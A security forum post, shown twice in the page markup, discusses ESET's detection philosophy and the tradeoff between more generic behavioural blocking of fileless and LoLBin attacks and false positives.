Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Video Reviews - Security and Privacy
Of LoLBins, 0 Days, and ESET (Part 2)
Message
<blockquote data-quote="Trident" data-source="post: 1084148" data-attributes="member: 99014"><p>Every vendor has different vision how their product should work and protect users, although to a large extent modules, features and functions overlap.</p><p>Some focus on reputation, others on machine learning, Eset is heavily focused on accurate, most of the time generic detections, that are machine-generated (documentation available as well) and on their local emulator for scripts, and executables.</p><p>It is possible to activate more aggressive modes for the local emulator and a cloud emulator, including what they call “sandbox on steroids” (experimental) is available as well for downloads.</p><p></p><p>It is possible to do a lot more to block fileless attacks, for example, I am fairly certain that no admin will start executing complicated scripts nowadays. And even if they do, I am certain they won’t be obfuscated and won’t include commands such as “join”, “split” and many others. I am also confident no admin will attempt to download files via certutil.</p><p></p><p>However, Eset’s Research and Development team most likely hasn’t found the necessary evidence that their current approach doesn’t work and have hence, not implemented more generic blocks.</p><p></p><p>Detection (signature) -> generic detection -> heuristic (short and effective logic) -> behavioural profile -> TTP-based behavioural analysis -> policy-based behavioural blocking (lockdown mode)…</p><p>The above progresses to more and more generic methods that can block more attacks and can also, create more false positives.</p><p>Home products are more or less “one size for all” solutions.</p><p>On business environments there are MSSPs that will analyse the solution weak points as well as the environment and will implement additional security measures.</p></blockquote><p></p>
[QUOTE="Trident, post: 1084148, member: 99014"] Every vendor has different vision how their product should work and protect users, although to a large extent modules, features and functions overlap. Some focus on reputation, others on machine learning, Eset is heavily focused on accurate, most of the time generic detections, that are machine-generated (documentation available as well) and on their local emulator for scripts, and executables. It is possible to activate more aggressive modes for the local emulator and a cloud emulator, including what they call “sandbox on steroids” (experimental) is available as well for downloads. It is possible to do a lot more to block fileless attacks, for example, I am fairly certain that no admin will start executing complicated scripts nowadays. And even if they do, I am certain they won’t be obfuscated and won’t include commands such as “join”, “split” and many others. I am also confident no admin will attempt to download files via certutil. However, Eset’s Research and Development team most likely hasn’t found the necessary evidence that their current approach doesn’t work and have hence, not implemented more generic blocks. Detection (signature) -> generic detection -> heuristic (short and effective logic) -> behavioural profile -> TTP-based behavioural analysis -> policy-based behavioural blocking (lockdown mode)… The above progresses to more and more generic methods that can block more attacks and can also, create more false positives. Home products are more or less “one size for all” solutions. On business environments there are MSSPs that will analyse the solution weak points as well as the environment and will implement additional security measures. [/QUOTE]
Insert quotes…
Verification
Post reply
Top
